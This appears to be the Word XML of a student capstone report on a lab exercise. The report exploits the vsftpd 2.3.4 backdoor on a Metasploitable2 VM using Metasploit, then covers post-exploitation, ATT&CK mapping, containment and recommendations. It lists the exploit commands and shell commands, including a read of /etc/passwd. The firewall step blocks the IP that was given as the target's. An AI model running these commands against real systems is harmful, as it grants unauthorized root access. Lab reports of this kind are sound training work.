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3A272">
      <w:pPr>
        <w:pStyle w:val="36"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Capstone Project Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A88F9A3">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="0A5FA261">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>Objective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF9DDE1">
      <w:r>
        <w:t>To simulate a real-world cyber attack, analyze system compromise, and apply detection and mitigation techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E802098">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>Environment Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07305C3F">
      <w:r>
        <w:t>Kali Linux (Attacker)</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>Metasploitable2 (Target)</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>IP: 192.168.133.106</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>Tool: Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2D338F">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>Attack Simulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E91F48">
      <w:r>
        <w:t>Exploit used: vsftpd_234_backdoor</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>Commands:</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>use exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>set RHOSTS 192.168.133.106</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0113E016">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>Result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C3F4A8">
      <w:r>
        <w:t>Successful exploitation. Command shell opened with root privileges (uid=0).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC59A54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>Post Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168D70EA">
      <w:r>
        <w:t>Executed commands: whoami, uname -a, ifconfig, ls /, cat /etc/passwd.</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>Confirmed full system compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFE882C">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F6A994">
      <w:r>
        <w:t>Attack mapped to MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>T1190 (Initial Access)</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>T1059 (Command Execution)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA82D10">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>Containment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B6CA76">
      <w:r>
        <w:t>Blocked attacker IP using:</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>sudo ufw deny from 192.168.133.106</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087ABDBD">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>Severity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593A827C">
      <w:r>
        <w:t>Critical – Remote exploit with root access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABCA0DD">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F18F214">
      <w:r>
        <w:t>- Patch vulnerable services</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>- Disable unnecessary ports</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>- Use IDS/IPS</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>- Monitor logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD36EE0">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>Screenshots (Proof)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E73E24">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5029200" cy="3725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B6CA">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Metasploit started</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6607B3E9">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5029200" cy="899795"/>
            <wp:effectExtent l="0" t="0" r="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EFD9">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Exploit configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9585D0">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5029200" cy="91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1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7AA1">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Exploit success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02858A1E">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5029200" cy="405765"/>
            <wp:effectExtent l="0" t="0" r="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F0C7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Firewall rule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698A0D30">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5029200" cy="4508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06C4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>whoami &amp; uname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195ED360">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5029200" cy="21971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A0F9">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04862B6E">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5029200" cy="52692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6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8F6F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>ls /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258C5498">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5029200" cy="38633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6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C400">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>/etc/passwd access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B9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FIELD FORENSIC PRO</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-20T10:12:42Z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31E5DBC3BEE541F9A16181D2E8937CC3_12</vt:lpwstr>
  </property>
</Properties>
</file>